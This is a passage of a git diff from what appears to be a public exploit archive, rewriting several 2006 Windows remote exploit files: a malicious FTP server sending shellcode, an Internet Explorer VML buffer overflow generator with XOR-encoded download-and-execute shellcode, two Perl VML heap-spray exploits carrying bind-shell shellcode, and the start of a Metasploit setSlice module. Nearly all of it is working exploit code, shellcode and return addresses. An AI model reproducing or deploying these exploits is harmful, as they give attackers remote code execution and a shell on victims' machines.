Socket error\n"); + return -1; + } + +server.sin_family = AF_INET; +server.sin_addr.s_addr = htonl(INADDR_ANY); +server.sin_port = htons(PORT); + +bind(sock, (struct sockaddr *) &server, sizeof(server)); +listen(sock, 1); + +printf("[+] Listening on %d\n", PORT); + +len = sizeof(client); +cl = accept(sock, (struct sockaddr *) &client, &len); + +printf("[+] Connection accepted from %s\n", inet_ntoa(client.sin_addr)); + +send(cl, "200 evil server ready :>\r\n", 26, 0); + +for(i = 0; i <= 3; i++) + { + memset(buffer, 0x00, BUFF_SIZE); + recv(cl, buffer, BUFF_SIZE - 1, 0); + printf("[+] Client request: %s", buffer); + send(cl, RESPONSE, strlen(RESPONSE), 0); + } + +//PASV request +memset(buffer, 0x00, BUFF_SIZE); +recv(cl, buffer, BUFF_SIZE - 1, 0); +printf("[+] Client request: %s", buffer); + +//PASV response +r_len = 1011; +memset(buffer, 0x90, BUFF_SIZE); +memcpy(buffer, "200 \x31\xc0", 6); 
+memcpy(buffer + 6, shellcode, sizeof(shellcode) - 1);
+*((unsigned long*)(&buffer[r_len])) = eip;
+memcpy(buffer + (r_len + 4), "\r\n\x00", 3);
+
+if(send(cl, buffer, strlen(buffer), 0) != -1)
+printf("[+] Sending buffer: OK\n");
+else
+printf("[-] Sending buffer: failed\n");
+
+printf("[*] Press enter to quit\n");
+getchar();
+
+return 0;
+}
+
+// milw0rm.com [2006-09-20]
diff --git a/platforms/windows/remote/2403.c b/platforms/windows/remote/2403.c
index a6bb4ff4a..3f47aa56b 100755
--- a/platforms/windows/remote/2403.c
+++ b/platforms/windows/remote/2403.c
@@ -1,207 +1,207 @@ -/* -*----------------------------------------------------------------------- -* -* vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit -* !!! 0day !!! Public Version !!! -* -* Copyright (C) 2006 XSec All Rights Reserved. -* -* Author : nop -* : nop#xsec.org -* : http://www.xsec.org -* : -* Tested : Windows 2000 Server CN -* : + Internet Explorer 6.0 SP1 -* : -* Complie : cl vml.c -* : -* Usage : d:\>vml -* : -* : Usage: vml [htmlfile] -* : -* : d:\>vml http://xsec.org/xxx.exe xxx.htm -* : -* -*------------------------------------------------------------------------ -*/ - -#include -#include -#include - -FILE *fp = NULL; -char *file = "xsec.htm"; -char *url = NULL; - -#define NOPSIZE 260 -#define MAXURL 60 - -//DWORD ret = 0x7Ffa4512; // call esp for CN -DWORD ret = 0x7800CCDD; // call esp for All win2k - -// Search Shellcode -unsigned char dc[] = -"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39" -"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3"; - -// Shellcode Start -unsigned char dcstart[] = -"noop"; - -// Download Exec Shellcode XOR with 0xee -unsigned char sc[] = -"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65" -"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE" -"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B" -"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA" -"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD" -"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6" -"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B" -"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1" -"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1" -"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED" -"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60" -"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8" -"\xF4\xC1\x9E"; - -// Shellcode 
End -unsigned char dcend[] = -"n00p"; - -// HTML Header -char * header = -"\n" -"\n" -"XSec.org\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -"\n" -; - -// convert string to NCR -void convert2ncr(unsigned char * buf, int size) -{ - int i=0; - unsigned int ncr = 0; - - for(i=0; i [htmlfile]\r\n\n", argv[0]); - exit(1); - } - - url = argv[1]; - if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < - 10 || strlen(url) > MAXURL) - { - printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL); - return; - } - - printf("[+] download url:%s\n", url); - - if(argc >=3) file = argv[2]; - - printf("[+] exploit file:%s\n", file); - - fp = fopen(file, "w+b"); - //fp = fopen(file, "w"); - if(!fp) - { - printf("[-] Open file error!\n"); - return; - } - - // print html header - fprintf(fp, "%s", header); - fflush(fp); - - for(i=0; ivml +* : +* : Usage: vml [htmlfile] +* : +* : d:\>vml http://xsec.org/xxx.exe xxx.htm +* : +* +*------------------------------------------------------------------------ +*/ + +#include +#include +#include + +FILE *fp = NULL; +char *file = "xsec.htm"; +char *url = NULL; + +#define NOPSIZE 260 +#define MAXURL 60 + +//DWORD ret = 0x7Ffa4512; // call esp for CN +DWORD ret = 0x7800CCDD; // call esp for All win2k + +// Search Shellcode +unsigned char dc[] = +"\x8B\xDC\xBE\x6F\x6F\x6F\x70\x4E\xBF\x6F\x30\x30\x70\x4F\x43\x39" +"\x3B\x75\xFB\x4B\x80\x33\xEE\x39\x73\xFC\x75\xF7\xFF\xD3"; + +// Shellcode Start +unsigned char dcstart[] = +"noop"; + +// Download Exec Shellcode XOR with 0xee +unsigned char sc[] = +"\x07\x4B\xEE\xEE\xEE\xB1\x8A\x4F\xDE\xEE\xEE\xEE\x65\xAE\xE2\x65" +"\x9E\xF2\x43\x65\x86\xE6\x65\x19\x84\xEA\xB7\x06\xAB\xEE\xEE\xEE" +"\x0C\x17\x86\x81\x80\xEE\xEE\x86\x9B\x9C\x82\x83\xBA\x11\xF8\x7B" +"\x06\xDE\xEE\xEE\xEE\x6D\x02\xCE\x65\x32\x84\xCE\xBD\x11\xB8\xEA" +"\x29\xEA\xED\xB2\x8F\xC0\x8B\x29\xAA\xED\xEA\x96\x8B\xEE\xEE\xDD" +"\x2E\xBE\xBE\xBD\xB9\xBE\x11\xB8\xFE\x65\x32\xBE\xBD\x11\xB8\xE6" 
+"\x84\xEF\x11\xB8\xE2\xBF\xB8\x65\x9B\xD2\x65\x9A\xC0\x96\xED\x1B" +"\xB8\x65\x98\xCE\xED\x1B\xDD\x27\xA7\xAF\x43\xED\x2B\xDD\x35\xE1" +"\x50\xFE\xD4\x38\x9A\xE6\x2F\x25\xE3\xED\x34\xAE\x05\x1F\xD5\xF1" +"\x9B\x09\xB0\x65\xB0\xCA\xED\x33\x88\x65\xE2\xA5\x65\xB0\xF2\xED" +"\x33\x65\xEA\x65\xED\x2B\x45\xB0\xB7\x2D\x06\xB8\x11\x11\x11\x60" +"\xA0\xE0\x02\x2F\x97\x0B\x56\x76\x10\x64\xE0\x90\x36\x0C\x9D\xD8" +"\xF4\xC1\x9E"; + +// Shellcode End +unsigned char dcend[] = +"n00p"; + +// HTML Header +char * header = +"\n" +"\n" +"XSec.org\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +"\n" +; + +// convert string to NCR +void convert2ncr(unsigned char * buf, int size) +{ + int i=0; + unsigned int ncr = 0; + + for(i=0; i [htmlfile]\r\n\n", argv[0]); + exit(1); + } + + url = argv[1]; + if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < + 10 || strlen(url) > MAXURL) + { + printf("[-] Invalid url. Must start with 'http://','ftp://' and < %d bytes.\n", MAXURL); + return; + } + + printf("[+] download url:%s\n", url); + + if(argc >=3) file = argv[2]; + + printf("[+] exploit file:%s\n", file); + + fp = fopen(file, "w+b"); + //fp = fopen(file, "w"); + if(!fp) + { + printf("[-] Open file error!\n"); + return; + } + + // print html header + fprintf(fp, "%s", header); + fflush(fp); + + for(i=0; i -# -# http://sf-freedom.blogspot.com -# -# For educational purpose only -# -# Note: This exploit is modified from Shirkdog's PoC -# (http://www.milw0rm.com/exploits/2400) -# -# I exploit the stack-based buffer overflow in the different manner because of -# the problem of shellcode. I use heap spraying technique to injection my -# shellcode in the heap. Because I can control EIP so I tell it to jump into -# the heap that contains shellcode ^-^ -# -# This exploit tested on: Windows XP SP1 + IE6 SP1 -# Windows XP SP0 + IE6 -# Windows 2000 SP4 + IE6 SP1 -# Windows 2000 SP4 + IE6 -# -# I will describe more implementation details at my blog in this weekend :) -# -# P.S. 
Because of the buffer overflow protection mechanism in Windows XP SP2, -# This exploit is not success. The situation that overwrite to the location -# that eax point to is not occured, so I cannot use my techqniue -# "The Fake Cookie" that I use to break buffer overflow protection in -# Windows Server 2003 SP0 to bypass it. If anybody can break this protection -# with some techniques, plz share information :) -# - -use strict; - -# win32_bind LPORT = 5555 - Metasploit -my $shellcode = -"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". -"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". -"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". -"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". -"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". -"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". -"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". -"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". -"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". -"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". -"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". -"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". -"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". -"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". -"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". -"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". -"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". -"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". -"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". -"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; - -my $jscript = -""; - -my $header = -"\n" . -"\n" . -"\n" . -"\n" . -"\n" . -"\n" . -$jscript . -"\n" . -"\n" ; - -my $footer = -"\n" . 
-"\n" . -""; - - -my $body1 = "\n" . -"\n" . -"\n" . -""; - -my $page = "\xff\xfe"; # magic number of M$ unicode file -my $c; - -# header + body1 -foreach $c (split //, ($header . $body1)) { - $page = $page . $c . "\x00"; -} - -# padding + ret -$page = $page . "\x41\x00" x (256) . # padding - "\x01\x0d\x0d\x0d" . # writable memory - "\x44\x44\x44\x44" . # padding - "\x0d\x0d\x0d\x0d"; # return address - -# body2 + footer -foreach $c (split //, ($body2 . $footer)) { - $page = $page . $c . "\x00"; -} - -open (IE_VML, ">", "exploit.html"); - -print IE_VML $page; - -close IE_VML; - -# This function copy from JSUnescape() code in Metasploit -sub convert_shellcode { - my $data = shift; - my $mode = shift() || 'LE'; - my $code = ''; - - # Encode the shellcode via %u sequences for JS's unescape() function - my $idx = 0; - - # Pad to an even number of bytes - if (length($data) % 2 != 0) { - $data .= substr($data, -1, 1); - } - - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - if ($mode eq 'LE') { - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - } else { - $code .= sprintf('%%u%.2x%.2x', $c1, $c2); - } - $idx += 2; - } - - return $code; -} - -# milw0rm.com [2006-09-21] +#!/usr/bin/perl +# +# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP0-SP1 + +# Windows 2000 SP4) +# +# Author: Trirat Puttaraksa (Kira) +# +# http://sf-freedom.blogspot.com +# +# For educational purpose only +# +# Note: This exploit is modified from Shirkdog's PoC +# (http://www.milw0rm.com/exploits/2400) +# +# I exploit the stack-based buffer overflow in the different manner because of +# the problem of shellcode. I use heap spraying technique to injection my +# shellcode in the heap. 
Because I can control EIP so I tell it to jump into +# the heap that contains shellcode ^-^ +# +# This exploit tested on: Windows XP SP1 + IE6 SP1 +# Windows XP SP0 + IE6 +# Windows 2000 SP4 + IE6 SP1 +# Windows 2000 SP4 + IE6 +# +# I will describe more implementation details at my blog in this weekend :) +# +# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2, +# This exploit is not success. The situation that overwrite to the location +# that eax point to is not occured, so I cannot use my techqniue +# "The Fake Cookie" that I use to break buffer overflow protection in +# Windows Server 2003 SP0 to bypass it. If anybody can break this protection +# with some techniques, plz share information :) +# + +use strict; + +# win32_bind LPORT = 5555 - Metasploit +my $shellcode = +"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". +"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". +"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". +"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". +"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". +"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". +"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". +"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". +"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". +"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". +"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". +"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". +"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". +"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". +"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". +"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". +"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". 
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". +"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". +"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; + +my $jscript = +""; + +my $header = +"\n" . +"\n" . +"\n" . +"\n" . +"\n" . +"\n" . +$jscript . +"\n" . +"\n" ; + +my $footer = +"\n" . +"\n" . +""; + + +my $body1 = "\n" . +"\n" . +"\n" . +""; + +my $page = "\xff\xfe"; # magic number of M$ unicode file +my $c; + +# header + body1 +foreach $c (split //, ($header . $body1)) { + $page = $page . $c . "\x00"; +} + +# padding + ret +$page = $page . "\x41\x00" x (256) . # padding + "\x01\x0d\x0d\x0d" . # writable memory + "\x44\x44\x44\x44" . # padding + "\x0d\x0d\x0d\x0d"; # return address + +# body2 + footer +foreach $c (split //, ($body2 . $footer)) { + $page = $page . $c . "\x00"; +} + +open (IE_VML, ">", "exploit.html"); + +print IE_VML $page; + +close IE_VML; + +# This function copy from JSUnescape() code in Metasploit +sub convert_shellcode { + my $data = shift; + my $mode = shift() || 'LE'; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + + # Pad to an even number of bytes + if (length($data) % 2 != 0) { + $data .= substr($data, -1, 1); + } + + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + if ($mode eq 'LE') { + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + } else { + $code .= sprintf('%%u%.2x%.2x', $c1, $c2); + } + $idx += 2; + } + + return $code; +} + +# milw0rm.com [2006-09-21] diff --git a/platforms/windows/remote/2425.html b/platforms/windows/remote/2425.html index a090ea0a7..304ac4434 100755 --- a/platforms/windows/remote/2425.html +++ b/platforms/windows/remote/2425.html @@ -67,5 +67,5 @@ v\:* { behavior: url(#VMLRender); } - -# milw0rm.com [2006-09-24] + +# milw0rm.com [2006-09-24] 
diff --git a/platforms/windows/remote/2426.pl b/platforms/windows/remote/2426.pl
index ee943e04c..96053c683 100755
--- a/platforms/windows/remote/2426.pl
+++ b/platforms/windows/remote/2426.pl
@@ -1,165 +1,165 @@ -#!/usr/bin/perl -# -# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2) -# -# Author: Trirat Puttaraksa (Kira) -# -# Credits: Niega -# -# [UPDATE Sep 24] -# At the first time, I decide to release this exploit on Oct 10. -# However, if u see this exploit before Oct 10, it is because of one -# of the following reason: -# 1. M$ release early than Oct 10 (may be impossible, lol) -# 2. there is someone already publish the exploit, so there is no means -# to still keep it private -# I'm already publish things about XP SP2 in my log :) -# -# http://sf-freedom.blogspot.com -# -############################################################################### -# For educational purpose only -# -# Note: This exploit is modified from Shirkdog's PoC -# (http://www.milw0rm.com/exploits/2400) -# -# I exploit the stack-based buffer overflow in the different manner because of -# the problem of shellcode. I use heap spraying technique to injection my -# shellcode in the heap. Because I can control EIP so I tell it to jump into -# the heap that contains shellcode ^-^ -# -# This exploit tested on: -# Windows XP SP2 + IE6 SP1 -# Windows XP SP1 + IE6 SP1 -# Windows XP SP0 + IE6 -# Windows 2000 SP4 + IE6 SP1 -# Windows 2000 SP4 + IE6 -# -# I will describe more implementation details at my blog in this weekend :) -# -# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2, -# This exploit is not success. The situation that overwrite to the location -# that eax point to is not occured, so I cannot use my techqniue -# "The Fake Cookie" that I use to break buffer overflow protection in -# Windows Server 2003 SP0 to bypass it. If anybody can break this protection -# with some techniques, plz share information :) -# - -use strict; - -# win32_bind LPORT = 5555 - Metasploit -my $shellcode = -"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". -"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". 
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". -"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". -"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". -"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". -"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". -"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". -"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". -"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". -"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". -"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". -"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". -"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". -"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". -"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". -"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". -"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". -"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". -"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; - -my $jscript = -""; - -my $header = -"\n" . -"\n" . -"\n" . -"\n" . -"\n" . -"\n" . -$jscript . -"\n" . -"\n" ; - -my $footer = -"\n" . -"\n" . -""; - - -my $body1 = "\n" . -"\n" . -"\n" . -""; - -my $page = "\xff\xfe"; # magic number of M$ unicode file -my $c; - -# header + body1 -foreach $c (split //, ($header . $body1)) { - $page = $page . $c . "\x00"; -} - -# very simple :) -$page = $page . "\x0d\x0d\x0d\x0d" x 65535; - -# body2 + footer -foreach $c (split //, ($body2 . $footer)) { - $page = $page . $c . 
"\x00"; -} - -open (IE_VML, ">", "exploit.html"); - -print IE_VML $page; - -close IE_VML; - -# This function copy from JSUnescape() code in Metasploit -sub convert_shellcode { - my $data = shift; - my $mode = shift() || 'LE'; - my $code = ''; - - # Encode the shellcode via %u sequences for JS's unescape() function - my $idx = 0; - - # Pad to an even number of bytes - if (length($data) % 2 != 0) { - $data .= substr($data, -1, 1); - } - - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - if ($mode eq 'LE') { - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - } else { - $code .= sprintf('%%u%.2x%.2x', $c1, $c2); - } - $idx += 2; - } - - return $code; -} - -# milw0rm.com [2006-09-25] +#!/usr/bin/perl +# +# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2) +# +# Author: Trirat Puttaraksa (Kira) +# +# Credits: Niega +# +# [UPDATE Sep 24] +# At the first time, I decide to release this exploit on Oct 10. +# However, if u see this exploit before Oct 10, it is because of one +# of the following reason: +# 1. M$ release early than Oct 10 (may be impossible, lol) +# 2. there is someone already publish the exploit, so there is no means +# to still keep it private +# I'm already publish things about XP SP2 in my log :) +# +# http://sf-freedom.blogspot.com +# +############################################################################### +# For educational purpose only +# +# Note: This exploit is modified from Shirkdog's PoC +# (http://www.milw0rm.com/exploits/2400) +# +# I exploit the stack-based buffer overflow in the different manner because of +# the problem of shellcode. I use heap spraying technique to injection my +# shellcode in the heap. 
Because I can control EIP so I tell it to jump into +# the heap that contains shellcode ^-^ +# +# This exploit tested on: +# Windows XP SP2 + IE6 SP1 +# Windows XP SP1 + IE6 SP1 +# Windows XP SP0 + IE6 +# Windows 2000 SP4 + IE6 SP1 +# Windows 2000 SP4 + IE6 +# +# I will describe more implementation details at my blog in this weekend :) +# +# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2, +# This exploit is not success. The situation that overwrite to the location +# that eax point to is not occured, so I cannot use my techqniue +# "The Fake Cookie" that I use to break buffer overflow protection in +# Windows Server 2003 SP0 to bypass it. If anybody can break this protection +# with some techniques, plz share information :) +# + +use strict; + +# win32_bind LPORT = 5555 - Metasploit +my $shellcode = +"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45". +"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49". +"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d". +"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66". +"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61". +"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40". +"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32". +"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6". +"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09". +"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0". +"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff". +"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53". +"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff". +"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64". +"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89". +"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab". 
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51". +"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53". +"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6". +"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"; + +my $jscript = +""; + +my $header = +"\n" . +"\n" . +"\n" . +"\n" . +"\n" . +"\n" . +$jscript . +"\n" . +"\n" ; + +my $footer = +"\n" . +"\n" . +""; + + +my $body1 = "\n" . +"\n" . +"\n" . +""; + +my $page = "\xff\xfe"; # magic number of M$ unicode file +my $c; + +# header + body1 +foreach $c (split //, ($header . $body1)) { + $page = $page . $c . "\x00"; +} + +# very simple :) +$page = $page . "\x0d\x0d\x0d\x0d" x 65535; + +# body2 + footer +foreach $c (split //, ($body2 . $footer)) { + $page = $page . $c . "\x00"; +} + +open (IE_VML, ">", "exploit.html"); + +print IE_VML $page; + +close IE_VML; + +# This function copy from JSUnescape() code in Metasploit +sub convert_shellcode { + my $data = shift; + my $mode = shift() || 'LE'; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + + # Pad to an even number of bytes + if (length($data) % 2 != 0) { + $data .= substr($data, -1, 1); + } + + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + if ($mode eq 'LE') { + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + } else { + $code .= sprintf('%%u%.2x%.2x', $c1, $c2); + } + $idx += 2; + } + + return $code; +} + +# milw0rm.com [2006-09-25] diff --git a/platforms/windows/remote/2440.rb b/platforms/windows/remote/2440.rb index f75072c54..98932f6f4 100755 --- a/platforms/windows/remote/2440.rb +++ b/platforms/windows/remote/2440.rb 
@@ -1,135 +1,135 @@ -# This module is part of the metasploit framework3 -# svn co http://metasploit.com/svn/framework3/trunk/ - -require 'msf/core' - -module Msf - -class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote - - include Exploit::Remote::HttpServer::Html - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Internet Explorer WebViewFolderIcon setSlice() Overflow', - 'Description' => %q{ - This module exploits a flaw in the WebViewFolderIcon ActiveX control - included with Windows 2000, Windows XP, and Windows 2003. This flaw was published - during the Month of Browser Bugs project (MoBB #18). - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'hdm', - ], - 'Version' => '$Revision: 3783 $', - 'References' => - [ - [ 'OSVDB', '27110' ], - [ 'BID', '19030' ], - [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ] - ], - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - - }, - 'Platform' => 'win', - 'Targets' => - [ - ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ] - ], - 'DefaultTarget' => 0)) - end - - def 